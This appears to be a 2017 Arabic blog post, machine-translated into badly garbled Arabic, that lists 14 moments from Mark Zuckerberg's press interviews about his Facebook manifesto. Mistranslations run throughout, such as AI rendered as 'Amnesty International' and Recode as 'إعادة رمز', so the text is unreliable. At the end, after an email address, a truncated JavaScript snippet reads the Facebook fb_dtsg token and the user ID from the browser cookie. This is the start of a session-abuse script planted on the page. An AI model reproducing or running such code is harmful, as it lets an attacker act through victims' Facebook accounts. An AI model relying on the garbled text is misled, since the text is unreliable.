vendredi 17 février 2017

وفيما يلي أفضل4 1خطة نقلت عن رئيس الفيسبوك مارك زوكربيرج




انخفض مارك زوكربيرج على الهائل من بيان يوم الخميس أن أقول للجميع عن بعض الطموح، إذا غامضة، وتخطط لديه في الاعتبار لالفيسبوك.

جوهر: الشبكة الاجتماعية لن يكون مجرد وسيلة التظاهر كنت لا تزال صداقات مع زملاء في المدرسة الثانوية. بدلا من ذلك، سيكون لإنقاذ العالم.

اقرأ أيضا: وقال مارك زوكربيرج مجرد أنه يريد الفيسبوك لإنقاذ العالم

فقط في قضيته 6000 كلمات لم تكن كافية، وتولى أيضا أسئلة من الصحفيين في وقت مبكر. جنبا إلى جنب مع الحصول على أول شرخ في تسمية وثيقة غير عادية - ذهب BuzzFeed مع "زوك مذهب"، في حين اختار إعادة رمز "مارك البيان" - كان الصحفيون قادرة على ندف أكثر قليلا من المعلومات من صاحبه.

هنا 14 من اللحظات الأكثر دلالة من المقابلات التي أجريت معهم.

1. كان اللاعب دونالد ترامب ليس "الزناد"

رفض زوكربيرج باستمرار للحديث عن دونالد ترامب، الذي يلوح في الافق مثل شبح مجهول على التأليف له.

ولكن الكثير من هذا الموضوع الذي يلمس - الخطاب السياسي، العولمة، والحقائق - لديها الكثير لتفعله مع ارتفاع ترامب إلى السلطة.

ومع ذلك، وقال زوكربيرج إعادة رمز لكارا سويشر أن ترامب لم يكن حافزا لله صحوة سياسية.

"، أثار لا حدث واحد واحد هذا" وقال للمخرج. وقال "لقد تم التفكير في هذه الأمور لفترة طويلة ... وجهات نظري أصبحت فقط أكثر دقة."

2. زوكربيرج لا يريدون الاستيلاء على الحكومة

لا، الفيسبوك لا تريد حرفيا إلى السيطرة على العالم، تصر زوكربيرج.


... وبدلا من ذلك، وقال انه هدف الفيسبوك، قال السيد زوكربيرج، لم يكن لاغتصاب المؤسسات التقليدية، مثل الحكومات والجماعات الدينية وغيرها من المجتمعات التي تشترك المصالح، وإنشاء مجموعات على الانترنت متماسكة بإحكام من شأنها أن تجعل هذه المؤسسات التقليدية أقوى.

3. انه ما زال لا يريد الترشح للرئاسة

على الرغم من التكهنات، زوكربيرج يصر جدا أنه ليس لديها خطط لتشغيل.

4. البيان هو التقدم في العمل

وفقط بدأت لمرحلة سياسية أكثر زوكربيرج.

"، هي التقدم في العمل زوكربيرج نفسه يعترف بأن استجابة شركته - - بل والشركة نفسها"، وقال القنوات الخلفية.

5. الفيسبوك يريد منك أن مواجهة الآخرين على منصة

الفيسبوك قد تحدث دائما لعبة كبيرة حول ربط العالم، ولكن كما ذكرنا بشدة في الآونة الأخيرة، في كثير من الأحيان لا العكس: أنه يدفع الناس بطبيعتها إلى فقاعات الرأي السياسية.

يقول زوكربيرج أنه يريد أن يجعل الأدوات التي تؤدي للمستخدمين تواجه "الناس غير مرجح."

في إعادة رمز:

وهكذا، دفعة لتقديم المزيد من الأدوات للناس من غير المرجح أن الاتصال حول المزيد من المناطق وربما حتى يدفع المزيد من الناس للقيام بذلك في الفيسبوك. "إن أفضل المجتمعات في العالم لديها قادة" قال.

6. وسوف يستغرق بعض الوقت

كما كنت قد خمنت، إنقاذ العالم لا يحدث بين عشية وضحاها.

وقال "لا يمكن أن يكون ذلك يحدث وليس على بذل كل ما في وسعنا لجعل هذا لن يحدث،" زوكربيرج إعادة رمز. "لن يكون لدينا هذه التكنولوجيا جاهزة لبعض الوقت، ولكن بمجرد أن يكون لديك القدرة على فهم ما هو المحتوى حول، لديك القدرة على فتح ذلك".

7. انه حقا إلى أهداف طويلة الأجل

يا لها من مفاجأة.

"بلدي واحد من يقتبس المفضلة لهذا بيل غيتس الاقتباس، أن" الناس يبالغون ما يمكن أن يحصل ذلك في غضون عامين، ونقلل ما يمكن أن يحصل ذلك في 10 عاما. "وهذا هو عقلية الهامة التي آمل أن المزيد من الناس تأخذ اليوم" وقال للأسوشيتد برس.

8. زوكربيرج تريد "التخلص من" الناس السيئين ... من الفيسبوك

يقول زوكربيرج يريد استخدامها لمنظمة العفو الدولية للقضاء على الأشخاص الذين يستخدمون منصة لفعل الأشياء الشائنة مثل الإرهابيين المجندين أو أشرطة فيديو آخر الانتحارية. الشركة وضعت مؤخرا بعض تلك السلطة نحو تحديد التمييز الإعلان.

"في الوقت الراهن نحن في محاولة لمعرفة ما اذا كنا نستطيع بناء أنظمة منظمة العفو الدولية إلى تحديد أي شخص يستخدم شبكاتنا لذلك حتى نتمكن من التخلص منها وتنبيه الأشخاص المناسبين"، وقال القنوات الخلفية.


جدول زمني 9. زوكربيرج لديها بعض ترامب الأخبار

زوكربيرج يدير المكان، وحتى انه لا يستطيع الهروب من سيل من الأخبار عن ترامب.

واضاف "انها كمية لا بأس بها"، وقال القنوات الخلفية.

 10. زوكربيرج هو "قلقة للغاية" بشأن "الإثارة في وسائل الإعلام"

بعد أشهر من نفي قاطع مشكلة أخبار وهمية الفيسبوك أو المسؤولية الصحفية، زوكربيرج بالقلق فجأة عن الناس كونها مطلعة.

"حتى لو أزلنا كل المعلومات الخاطئة، والناس سوف يؤكد فقط مجموعات مختلفة من الحقائق لتتناسب مع آرائهم الاستقطاب"، وقال تك كرانش. واضاف "هذا هو السبب في أنني أشعر بالقلق جدا حول الإثارة في وسائل الإعلام."

"مع مرور الوقت، سوف مجتمعنا تحديد أي توفر مصادر مجموعة كاملة من وجهات النظر بحيث محتوى وبطبيعة الحال السطح أكثر من ذلك."

11. زوكربيرج يعترف انه miscommunicated في البداية وجهات نظره بشأن أنباء وهمية

يتحدث عن الأخبار وهمية، زوكربيرج أيضا يعترف الآن بأنه كان من الخطأ أن ينكر دور الفيسبوك في نشر ذلك.

"أنا قد افسدت أن واحدة من قبل لا يعطي السياق الأوسع، واعتقد الناس أن الشيء الضيق وكيف أفكر في هذا على نطاق واسع"، قال.

12. زوكربيرج يرى في الفيسبوك "خلل" ذريعة أنها بحاجة إلى تحسين

لماذا الفيسبوك حذف الأشياء؟ انها ليست دائما واضحة. وقال زوكربيرج الشركة يمكن أن تكون أكثر شفافية.


حتى الآن، وقد اعتمدت الشركة على عدد قليل من الأعذار المبهمة لشرح إزالة محتوى كبير من الناحية السياسية، بما في ذلك "خلل"، "المسائل التقنية"، و "خطأ". وردا على سؤال اذا كان يعتقد ان العالم يستفيد من سماع في أكثر شفافية أزياء لماذا الفيسبوك يجعل القرارات لإنزال محتوى معين، أجاب زوكربيرج، "نعم"، ثم توقف عن التنفيذ. وقال "هناك الكثير من الأشياء التي نحن بحاجة للحصول على أفضل على في هذا [المنطقة]." "

13. وتفضل عدم الحديث عن الصين

ذكر زوكربيرج الخياطة سياسات الفيسبوك إلى أماكن محددة، لكنه لا يريد أن يقول ما إذا كان ذلك يعني أن الشركة تخضع للرقابة وإطلاقها في الصين.

"إن الفلسفة العامة هي أننا نريد من الجميع أن تكون قادرة على القول بقدر ما تستطيع، ويكون أقل قدر ممكن الحصول المحظورة" وقال القنوات الخلفية، دون التطرق إلى بلد على وجه التحديد.

و14. زوكربيرج ولا تجب ما إذا كان ترامب يؤمن مهمة في الفيسبوك

ترامب يحب التغريد، ولكن سوف زوكربيرج لا التكهن ما إذا كان الرئيس يوافق على مهمة الفيسبوك لربط الناس.

"أنا لا أعتقد أنني ذاهب إلى التحدث إلى أن مباشرة" قال لبي بي سي. "يمكنك التحدث معه، يمكنك إلقاء نظرة على ما قاله للحصول على شعور من ذلك."

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...